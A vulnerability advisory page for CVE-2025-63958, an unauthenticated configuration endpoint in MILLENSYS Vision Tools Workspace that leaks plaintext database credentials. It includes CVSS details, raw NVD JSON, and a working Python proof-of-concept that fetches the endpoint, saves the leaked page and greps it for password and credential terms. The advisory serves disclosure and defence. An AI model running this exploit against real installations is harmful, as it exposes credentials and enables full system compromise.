Security Vulnerability Report
中文
CVE-2025-63958 CVSS 9.8 CRITICAL

CVE-2025-63958

Published: 2025-11-24 17:16:09
Last Modified: 2025-12-30 17:53:54
Source: [email protected]

Description

MILLENSYS Vision Tools Workspace 6.5.0.2585 exposes a sensitive configuration endpoint (/MILLENSYS/settings) that is accessible without authentication. This page leaks plaintext database credentials, file share paths, internal license server configuration, and software update parameters. An unauthenticated attacker can retrieve this information by accessing the endpoint directly, potentially leading to full system compromise. The vulnerability is due to missing access controls on a privileged administrative function.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:millensys:vision_tools_workspace:5.10.5.2429:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:millensys:vision_tools_workspace:6.5.0.2585:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:millensys:vision_tools_workspace:6.5.0.2596:*:*:*:*:*:*:* - VULNERABLE
MILLENSYS Vision Tools Workspace 6.5.0.2585及之前版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-63958 PoC - MILLENSYS Vision Tools Workspace Information Disclosure # Target: MILLENSYS Vision Tools Workspace <= 6.5.0.2585 # Endpoint: /MILLENSYS/settings def exploit_cve_2025_63958(target_url): """ Exploit for CVE-2025-63958 Unauthenticated access to sensitive configuration endpoint """ # Construct the vulnerable endpoint URL endpoint = "/MILLENSYS/settings" url = target_url.rstrip('/') + endpoint print(f"[*] Target: {target_url}") print(f"[*] Exploiting endpoint: {url}") try: # Send HTTP GET request without authentication headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } response = requests.get(url, headers=headers, timeout=10, verify=False) print(f"[+] Status Code: {response.status_code}") if response.status_code == 200: print(f"[!] VULNERABLE - Sensitive data exposed!") print(f"[+] Response Length: {len(response.text)} bytes") # Save the response for analysis with open('cve_2025_63958_leaked_data.html', 'w', encoding='utf-8') as f: f.write(response.text) print("[+] Leaked data saved to: cve_2025_63958_leaked_data.html") # Extract sensitive information patterns sensitive_patterns = [ 'password', 'database', 'connection', 'server', 'credential', 'license', 'update', 'share' ] print("\n[*] Searching for sensitive data patterns...") for pattern in sensitive_patterns: if pattern.lower() in response.text.lower(): print(f"[+] Found potential sensitive data: {pattern}") return True else: print(f"[-] Endpoint returned status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://target.com:8080") sys.exit(1) target = sys.argv[1] exploit_cve_2025_63958(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63958", "sourceIdentifier": "[email protected]", "published": "2025-11-24T17:16:09.040", "lastModified": "2025-12-30T17:53:54.407", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MILLENSYS Vision Tools Workspace 6.5.0.2585 exposes a sensitive configuration endpoint (/MILLENSYS/settings) that is accessible without authentication. This page leaks plaintext database credentials, file share paths, internal license server configuration, and software update parameters. An unauthenticated attacker can retrieve this information by accessing the endpoint directly, potentially leading to full system compromise. The vulnerability is due to missing access controls on a privileged administrative function."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:millensys:vision_tools_workspace:5.10.5.2429:*:*:*:*:*:*:*", "matchCriteriaId": "97A920CC-D27C-4A7C-93F9-0AF05A95B597"}, {"vulnerable": true, "criteria": "cpe:2.3:a:millensys:vision_tools_workspace:6.5.0.2585:*:*:*:*:*:*:*", "matchCriteriaId": "11AA6384-D827-42D0-970B-808C9C6A2484"}, {"vulnerable": true, "criteria": "cpe:2.3:a:millensys:vision_tools_workspace:6.5.0.2596:*:*:*:*:*:*:*", "matchCriteriaId": "3040C86D-0E4C-453F-9AAC-7BA0E8B230F3"}]}]}], "references": [{"url": "https://ozex.gitlab.io/tricks_hacks/2025-11-19-cve-2025-63958/index.html", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.millensys.com/", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.